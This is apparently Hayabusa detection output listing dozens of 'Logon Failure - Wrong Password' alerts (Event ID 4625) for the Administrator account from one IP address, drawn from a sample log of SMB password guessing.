2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1qoRw2jjFx4F6Wx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ImiLeiteLoSw32I0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcIYD47BIEP8gB0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lUAeB15aWamcaZ8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFOKiSDWc1dWjzge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hqyMtzjKSJEtEAdx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtHsItpyFHQxvLWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RdGMqIhUGHj23Xm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfE5LVmrPaAFLwBR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1swKSla5gkdOwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kL9MdVnRVogiP7hF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aQ0hRdwZvC5PBcXl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ctbv73J0Dot9raD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wKpWApJIKkjbtaPB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kVTAv9VoNpUyxQFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xb3t1dpuk9JZri5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fy0UrW8TWrxAOX90 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iUXUbUsiE6Ahh9iD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2QQdQ6rQYLBf15AF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zG4eJLuQ4u2dKQG0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCfwHs2gVGiRc3Fy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67TcwQfTxgTtQvCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imnSPKAKYzrCKSUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMNbdjiXNUY0gTfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOAH0gjfs8JcXSMO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TnnB4KPBiDvKMsUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aZRgpa5riqIEWhQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBL4nrs7f6cjlfsT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fgDupzqipe5jK0r5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5yPcTOWPuN8efJtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dszb6s0w6glvSkSw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ynu936pVVAuDUGT5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c55o3Dca2tiUVwb2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnDmp2KK02LyJ7Xm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRUKrHDAmgEPcjQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PCGKDvPhzg6BlsuU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OU28biGLJkFmB117 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 029LphuWcoo9S2hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItIROqP2wyzLJa9s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XngGun3HYopTkcrA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c91Qz5QNUczcm7m6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7nyWJJJhDiqnf1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnj7hAp20gZE9FCe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FydQjBxO7XninU5Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P8InIzyD86BXr1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvKGa3A3qw7s0cZX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QTY7tRVEMjXZXFyH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4Ij1NSYGYbq4PxS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 47fOxZAYhjxLzEoU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGxXaNNChVScbHe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jTcVeB8f2Rs3Bldo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeSnUlIbuDVNffey | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eXIM4tWru1x0AahJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m2pBLn6aO8L4kiH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EG5daDsgTMZsNg0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3V8z6j7GLO3ywBXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AsezMvhUNedLNqg4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h16AvUVZG8qch7LC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PB5xe3Aieya8N3IU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezGXIhYrkk2Q9pe5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VSGIVhD6pO5z47DY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2vEjOhJW9G3aIfV0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hyvCpW3aOZqCOldu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhS2wAAkfmZuLll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bEh0KTMbbFtsfck | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mw9u61efa06vYv6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SAxij8QYLxxriIvu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HK2tbzICSpTrglud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rHJ70VrEwCQjSvL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qwZT66ExkdJDZaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezuHluj1fEC9KdQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bXH5uDfo4WB6QEnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWvZjuZhnGcrelOM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vb6ePjmpA8ZwK1PW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
